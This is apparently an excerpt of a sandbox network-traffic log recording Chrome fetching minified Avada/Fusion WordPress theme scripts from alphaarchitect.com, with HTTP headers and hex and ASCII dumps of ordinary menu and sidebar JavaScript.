                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC878INData Raw: 64 65 64 0d 0a 66 75 6e 63 74 69 6f 6e 20 66 75 73 69 6f 6e 52 65 53 65 74 74 53 74 69 63 6b 79 53 69 64 65 62 61 72 53 74 61 74 75 73 28 29 7b 73 65 74 53 74 69 63 6b 79 53 69 64 65 62 61 72 53 74 61 74 75 73 28 63 61 6c 63 53 74 69 63 6b 79 53 69 64 65 62 61 72 4f 66 66 73 65 74 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 73 65 74 53 74 69 63 6b 79 53 69 64 65 62 61 72 53 74 61 74 75 73 28 65 29 7b 21 4d 6f 64 65 72 6e 69 7a 72 2e 6d 71 28 22 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 22 2b 61 76 61 64 61 53 69 64 65 62 61 72 73 56 61 72 73 2e 73 69 64 65 62 61 72 5f 62 72 65 61 6b 5f 70 6f 69 6e 74 2b 22 70 78 29 22 29 26 26 4d 61 74 68 2e 66 6c 6f 6f 72 28 6a 51 75 65 72 79 28 22 23 63 6f 6e 74 65 6e 74 22 29 2e 68 65
                                                                                                                                                                                                                                                                        Data Ascii: dedfunction fusionReSettStickySidebarStatus(){setStickySidebarStatus(calcStickySidebarOffset())}function setStickySidebarStatus(e){!Modernizr.mq("only screen and (max-width:"+avadaSidebarsVars.sidebar_break_point+"px)")&&Math.floor(jQuery("#content").he
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 6e 67 74 68 26 26 28 73 2e 70 61 72 65 6e 74 28 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 70 61 6e 65 6c 2d 63 75 73 74 6f 6d 69 7a 61 62 6c 65 2d 6e 65 65 64 73 2d 70 6f 73 69 74 69 6f 6e 65 64 22 29 2c 73 2e 70 72 65 70 65 6e 64 28 73 2e 70 61 72 65 6e 74 28 29 2e 63 68 69 6c 64 72 65 6e 28 22 2e 66 75 73 69 6f 6e 2d 70 61 6e 65 6c 2d 73 68 6f 72 74 63 75 74 73 2d 77 72 61 70 70 65 72 22 29 29 29 7d 29 2e 6f 6e 28 22 73 74 69 63 6b 79 5f 6b 69 74 3a 75 6e 73 74 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 73 3d 6a 51 75 65 72 79 28 65 2e 74 61 72 67 65 74 29 3b 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 68 61 73 43 6c 61 73 73 28 22 64 6f 75 62 6c 65 2d 73 69 64 65 62 61 72 73 22 29 26 26 73 2e 63 73 73 28 22
                                                                                                                                                                                                                                                                        Data Ascii: ngth&&(s.parent().removeClass("fusion-panel-customizable-needs-positioned"),s.prepend(s.parent().children(".fusion-panel-shortcuts-wrapper")))}).on("sticky_kit:unstick",function(e){var s=jQuery(e.target);jQuery("body").hasClass("double-sidebars")&&s.css("
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1325INData Raw: 72 74 63 75 74 73 2d 77 72 61 70 70 65 72 22 29 2e 6c 65 6e 67 74 68 26 26 28 73 2e 70 61 72 65 6e 74 28 29 2e 61 64 64 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 70 61 6e 65 6c 2d 63 75 73 74 6f 6d 69 7a 61 62 6c 65 2d 6e 65 65 64 73 2d 70 6f 73 69 74 69 6f 6e 65 64 22 29 2c 73 2e 70 61 72 65 6e 74 28 29 2e 70 72 65 70 65 6e 64 28 73 2e 63 68 69 6c 64 72 65 6e 28 22 2e 66 75 73 69 6f 6e 2d 70 61 6e 65 6c 2d 73 68 6f 72 74 63 75 74 73 2d 77 72 61 70 70 65 72 22 29 29 29 7d 29 29 3a 28 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 73 69 64 65 62 61 72 2d 6c 65 66 74 2e 66 75 73 69 6f 6e 2d 73 74 69 63 6b 79 2d 73 69 64 65 62 61 72 20 2e 66 75 73 69 6f 6e 2d 73 69 64 65 62 61 72 2d 69 6e 6e 65 72 2d 63 6f 6e 74 65 6e 74 22 29 2e 74 72 69 67 67 65 72 28 22
                                                                                                                                                                                                                                                                        Data Ascii: rtcuts-wrapper").length&&(s.parent().addClass("fusion-panel-customizable-needs-positioned"),s.parent().prepend(s.children(".fusion-panel-shortcuts-wrapper")))})):(jQuery(".fusion-sidebar-left.fusion-sticky-sidebar .fusion-sidebar-inner-content").trigger("
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        143192.168.2.449901141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC621OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-alert.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:04 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-103"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147821
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba35e984431f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC266INData Raw: 31 30 33 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 72 65 61 64 79 20 66 75 73 69 6f 6e 2d 65 6c 65 6d 65 6e 74 2d 72 65 6e 64 65 72 2d 66 75 73 69 6f 6e 5f 61 6c 65 72 74 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 28 76 6f 69 64 20 30 21 3d 3d 6e 3f 6a 51 75 65 72 79 28 27 64 69 76 5b 64 61 74 61 2d 63 69 64 3d 22 27 2b 6e 2b 27 22 5d 27 29 2e 66 69 6e 64 28 22 2e 66 75 73 69 6f 6e 2d 61 6c 65 72 74 20 2e 63 6c 6f 73 65 22 29 3a 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 61 6c 65 72 74 20 2e 63 6c 6f 73 65 22 29 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 28 29 2e 73 6c 69 64
                                                                                                                                                                                                                                                                        Data Ascii: 103jQuery(document).on("ready fusion-element-render-fusion_alert",function(e,n){(void 0!==n?jQuery('div[data-cid="'+n+'"]').find(".fusion-alert .close"):jQuery(".fusion-alert .close")).on("click",function(e){e.preventDefault(),jQuery(this).parent().slid
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        144192.168.2.449902141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC617OUTGET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-menu.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:04 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-38c7"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147821
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba35ffd2726f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC877INData Raw: 33 38 63 37 0d 0a 76 61 72 20 66 75 73 69 6f 6e 4e 61 76 43 6c 69 63 6b 45 78 70 61 6e 64 42 74 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 3f 6a 51 75 65 72 79 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 3a 6a 51 75 65 72 79 28 65 29 2c 61 3d 6e 2e 70 61 72 65 6e 74 28 29 3b 61 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 65 78 70 61 6e 64 65 64 22 29 2c 61 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 66 61 6c 73 65 22 3d 3d 3d 61 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 29 3f 22 74 72 75 65 22 3a 22 66 61 6c 73 65 22 29 2c 6e 2e 61 74
                                                                                                                                                                                                                                                                        Data Ascii: 38c7var fusionNavClickExpandBtn=function(e){var n="object"==typeof e&&"object"==typeof e.currentTarget?jQuery(e.currentTarget):jQuery(e),a=n.parent();a.toggleClass("expanded"),a.attr("aria-expanded","false"===a.attr("aria-expanded")?"true":"false"),n.at
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 61 72 67 65 74 26 26 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 61 2e 68 61 73 43 6c 61 73 73 28 22 63 6f 6c 6c 61 70 73 65 2d 65 6e 61 62 6c 65 64 22 29 3f 28 61 2e 68 61 73 43 6c 61 73 73 28 22 61 77 62 2d 6d 65 6e 75 5f 6d 6f 62 69 6c 65 2d 61 63 63 6f 72 64 69 6f 6e 22 29 26 26 75 2e 73 69 62 6c 69 6e 67 73 28 22 2e 65 78 70 61 6e 64 65 64 22 29 2e 66 69 6e 64 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6f 70 65 6e 2d 6e 61 76 2d 73 75 62 6d 65 6e 75 5f 6d 6f 62 69 6c 65 22 29 2e 74 72 69 67 67 65 72 28 22 63 6c 69 63 6b 22 29 2c 75 2e 63 68 69 6c 64 72 65 6e 28 22 2e 66 75 73 69 6f 6e 2d 6d 65 67 61 6d 65 6e 75 2d 77 72 61 70 70 65 72 2c 20 2e 61 77 62 2d 6d 65 6e 75 5f 5f 73 75 62 2d 75 6c 2c 20 2e
                                                                                                                                                                                                                                                                        Data Ascii: t"==typeof e.target&&e.preventDefault(),a.hasClass("collapse-enabled")?(a.hasClass("awb-menu_mobile-accordion")&&u.siblings(".expanded").find(".awb-menu__open-nav-submenu_mobile").trigger("click"),u.children(".fusion-megamenu-wrapper, .awb-menu__sub-ul, .
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 2e 64 61 74 61 28 22 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 65 22 29 29 2c 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 68 61 73 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 62 75 69 6c 64 65 72 2d 6c 69 76 65 22 29 26 26 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 68 61 73 43 6c 61 73 73 28 22 61 76 61 64 61 2d 66 6f 6f 74 65 72 2d 66 78 2d 70 61 72 61 6c 6c 61 78 2d 65 66 66 65 63 74 22 29 26 26 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 61 64 64 43 6c 61 73 73 28 22 61 76 61 64 61 2d 66 6c 79 6f 75 74 2d 73 75 62 6d 65 6e 75 2d 61 63 74 69 76 65 22 29 29 2c 75 2e 68 61 73 43 6c 61 73 73 28 22 61 77 62 2d 6d 65 6e 75 5f 5f 6c 69 5f 73 65 61 72 63 68 2d 64 72 6f 70 64 6f 77 6e 22 29 26 26 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                                        Data Ascii: .data("transition-time")),jQuery("body").hasClass("fusion-builder-live")&&jQuery("body").hasClass("avada-footer-fx-parallax-effect")&&jQuery("body").addClass("avada-flyout-submenu-active")),u.hasClass("awb-menu__li_search-dropdown")&&setTimeout(function()
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 67 74 68 3f 69 2e 66 69 6e 64 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 73 75 62 2d 61 72 72 6f 77 22 29 2e 6f 75 74 65 72 57 69 64 74 68 28 29 3a 30 3b 21 63 7c 7c 66 7c 7c 6d 2e 68 61 73 43 6c 61 73 73 28 22 61 77 62 2d 6d 65 6e 75 5f 66 6c 79 6f 75 74 22 29 7c 7c 6d 2e 68 61 73 43 6c 61 73 73 28 22 61 77 62 2d 6d 65 6e 75 5f 76 2d 73 74 61 63 6b 65 64 22 29 7c 7c 21 63 2e 6c 65 6e 67 74 68 7c 7c 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 68 61 73 43 6c 61 73 73 28 22 73 69 64 65 2d 68 65 61 64 65 72 22 29 26 26 30 3c 6d 2e 63 6c 6f 73 65 73 74 28 22 23 73 69 64 65 2d 68 65 61 64 65 72 2e 66 75 73 69 6f 6e 2d 74 62 2d 68 65 61 64 65 72 22 29 2e 6c 65 6e 67 74 68 7c 7c 28 73 3d 63 2e 63 73 73 28 22 6c 65 66 74 22 29 2c 74 3d 63 2e 63 73 73 28 22 72 69 67
                                                                                                                                                                                                                                                                        Data Ascii: gth?i.find(".awb-menu__sub-arrow").outerWidth():0;!c||f||m.hasClass("awb-menu_flyout")||m.hasClass("awb-menu_v-stacked")||!c.length||jQuery("body").hasClass("side-header")&&0<m.closest("#side-header.fusion-tb-header").length||(s=c.css("left"),t=c.css("rig
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 73 75 62 6d 65 6e 75 5f 6d 61 69 6e 22 29 29 7d 2c 66 75 73 69 6f 6e 4e 61 76 41 6c 74 41 72 72 6f 77 73 43 6c 61 73 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 6a 51 75 65 72 79 28 65 29 2e 66 69 6e 64 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 73 75 62 2d 61 72 72 6f 77 22 29 2e 6c 65 6e 67 74 68 29 7b 6a 51 75 65 72 79 28 65 29 2e 66 69 6e 64 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 73 75 62 2d 61 72 72 6f 77 20 2b 20 75 6c 20 3e 20 2e 61 77 62 2d 6d 65 6e 75 5f 5f 73 75 62 2d 6c 69 3a 6e 6f 74 28 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 29 3a 66 69 72 73 74 2d 63 68 69 6c 64 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 65 6e 74 65 72 20 6d 6f 75 73 65 6c 65 61 76 65 20 66 6f 63 75 73 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 6a
                                                                                                                                                                                                                                                                        Data Ascii: submenu_main"))},fusionNavAltArrowsClass=function(e){if(jQuery(e).find(".awb-menu__sub-arrow").length){jQuery(e).find(".awb-menu__sub-arrow + ul > .awb-menu__sub-li:not(.current-menu-item):first-child").on("mouseenter mouseleave focus",function(e){var n=j
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6f 70 65 6e 2d 6e 61 76 2d 73 75 62 6d 65 6e 75 5f 6d 6f 62 69 6c 65 2c 20 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6f 70 65 6e 2d 6e 61 76 2d 73 75 62 6d 65 6e 75 5f 63 6c 69 63 6b 2c 20 2e 61 77 62 2d 73 75 62 6d 65 6e 75 5f 5f 6f 70 65 6e 2d 6e 61 76 2d 73 75 62 6d 65 6e 75 5f 63 6c 69 63 6b 22 29 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 65 78 70 61 6e 64 53 75 62 6d 65 6e 75 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 65 78 70 61 6e 64 53 75 62 6d 65 6e 75 22 2c 66 75 73 69 6f 6e 4e 61 76 43 6c 69 63 6b 45 78 70 61 6e 64 53 75 62 6d 65 6e 75 42 74 6e 29 2c 6a 51 75 65 72 79 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6c 69 5f 73 65 61 72 63 68 2d 64 72 6f 70 64 6f 77 6e 20 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6d 61 69 6e 2d 61 22 29 2e 6f
                                                                                                                                                                                                                                                                        Data Ascii: (".awb-menu__open-nav-submenu_mobile, .awb-menu__open-nav-submenu_click, .awb-submenu__open-nav-submenu_click").off("click.expandSubmenu").on("click.expandSubmenu",fusionNavClickExpandSubmenuBtn),jQuery(".awb-menu__li_search-dropdown .awb-menu__main-a").o
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 68 74 6d 6c 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 6c 65 61 76 65 22 2c 22 2e 66 75 73 69 6f 6e 2d 6e 6f 2d 74 6f 75 63 68 20 2e 61 77 62 2d 6d 65 6e 75 5f 66 6c 79 6f 75 74 2e 61 77 62 2d 6d 65 6e 75 5f 64 65 73 6b 74 6f 70 20 2e 61 77 62 2d 6d 65 6e 75 5f 5f 73 75 62 2d 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2c 6e 3d 65 2e 70 61 72 65 6e 74 28 29 3b 76 6f 69 64 20 30 21 3d 3d 6e 2e 64 61 74 61 28 22 69 74 65 6d 2d 69 64 22 29 26 26 28 65 2e 63 6c 6f 73 65 73 74 28 22 2e 61 77 62 2d 6d 65 6e 75 22 29 2e 66 69 6e 64 28 22 2e 66 75 73 69 6f 6e 2d 66 6c 79 6f 75 74 2d 6d 65 6e 75 2d 62 61 63 6b 67 72 6f 75 6e 64 73 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 66 6c 79 6f 75 74 2d
                                                                                                                                                                                                                                                                        Data Ascii: html").on("mouseleave",".fusion-no-touch .awb-menu_flyout.awb-menu_desktop .awb-menu__sub-a",function(){var e=jQuery(this),n=e.parent();void 0!==n.data("item-id")&&(e.closest(".awb-menu").find(".fusion-flyout-menu-backgrounds").removeClass("fusion-flyout-
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 2d 66 75 6c 6c 2d 61 62 73 6f 6c 75 74 65 22 29 7c 7c 6e 2e 68 61 73 43 6c 61 73 73 28 22 6d 6f 62 69 6c 65 2d 73 69 7a 65 2d 63 6f 6c 75 6d 6e 2d 61 62 73 6f 6c 75 74 65 22 29 29 26 26 65 2e 6c 65 6e 67 74 68 26 26 22 22 21 3d 3d 74 68 69 73 2e 68 61 73 68 2e 73 6c 69 63 65 28 31 29 26 26 6e 2e 66 69 6e 64 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6d 2d 74 6f 67 67 6c 65 22 29 2e 74 72 69 67 67 65 72 28 22 63 6c 69 63 6b 22 29 7d 29 2c 6a 51 75 65 72 79 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 76 2d 73 74 61 63 6b 65 64 2e 61 77 62 2d 6d 65 6e 75 5f 65 6d 2d 68 6f 76 65 72 20 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6c 69 22 29 2e 6f 66 66 28 22 6d 6f 75 73 65 65 6e 74 65 72 2e 76 65 72 74 69 63 61 6c 4d 65 6e 75 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 65 6e 74 65 72 2e 76
                                                                                                                                                                                                                                                                        Data Ascii: -full-absolute")||n.hasClass("mobile-size-column-absolute"))&&e.length&&""!==this.hash.slice(1)&&n.find(".awb-menu__m-toggle").trigger("click")}),jQuery(".awb-menu_v-stacked.awb-menu_em-hover .awb-menu__li").off("mouseenter.verticalMenu").on("mouseenter.v
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 75 62 6d 65 6e 75 5f 5f 6c 69 22 29 2e 6f 66 66 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 76 65 72 74 69 63 61 6c 4d 65 6e 75 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 76 65 72 74 69 63 61 6c 4d 65 6e 75 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 66 69 6e 64 28 22 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 6c 65 6e 67 74 68 7c 7c 28 6a 51 75 65 72 79 28 74 68 69 73 29 2e 73 74 6f 70 28 29 2c 66 75 73 69 6f 6e 56 65 72 74 69 63 61 6c 53 75 62 6d 65 6e 75 44 69 72 65 63 74 69 6f 6e 28 6a 51 75 65 72 79 28 74 68 69 73 29 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 68 69 6c 64 72 65 6e 28 22 2e 61 77 62 2d 73 75 62 6d 65 6e 75 5f 5f 73 75 62 2d 61 2c 20 2e 61 77 62 2d 73 75 62 6d 65 6e 75 5f
                                                                                                                                                                                                                                                                        Data Ascii: ubmenu__li").off("mouseleave.verticalMenu").on("mouseleave.verticalMenu",function(){jQuery(this).find(".current-menu-item").length||(jQuery(this).stop(),fusionVerticalSubmenuDirection(jQuery(this)),jQuery(this).children(".awb-submenu__sub-a, .awb-submenu_
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 75 5f 5f 6f 70 65 6e 2d 6e 61 76 2d 73 75 62 6d 65 6e 75 2d 68 6f 76 65 72 22 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 74 72 75 65 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 68 69 6c 64 72 65 6e 28 22 2e 61 77 62 2d 73 75 62 6d 65 6e 75 5f 5f 73 75 62 2d 61 22 29 2e 66 69 6e 64 28 22 2e 61 77 62 2d 73 75 62 6d 65 6e 75 5f 5f 6f 70 65 6e 2d 6e 61 76 2d 73 75 62 6d 65 6e 75 2d 68 6f 76 65 72 22 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 74 72 75 65 22 29 7d 29 7d 29 7d 2c 66 75 73 69 6f 6e 41 64 6a 75 73 74 4e 61 76 4d 6f 62 69 6c 65 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 73 69 6f 6e 4e 61 76 4d 6f
                                                                                                                                                                                                                                                                        Data Ascii: u__open-nav-submenu-hover").attr("aria-expanded","true"),jQuery(this).children(".awb-submenu__sub-a").find(".awb-submenu__open-nav-submenu-hover").attr("aria-expanded","true")})})},fusionAdjustNavMobilePosition=function(){setTimeout(function(){fusionNavMo


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        145192.168.2.449903141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC619OUTGET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/awb-mega-menu.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:04 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-6ae"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
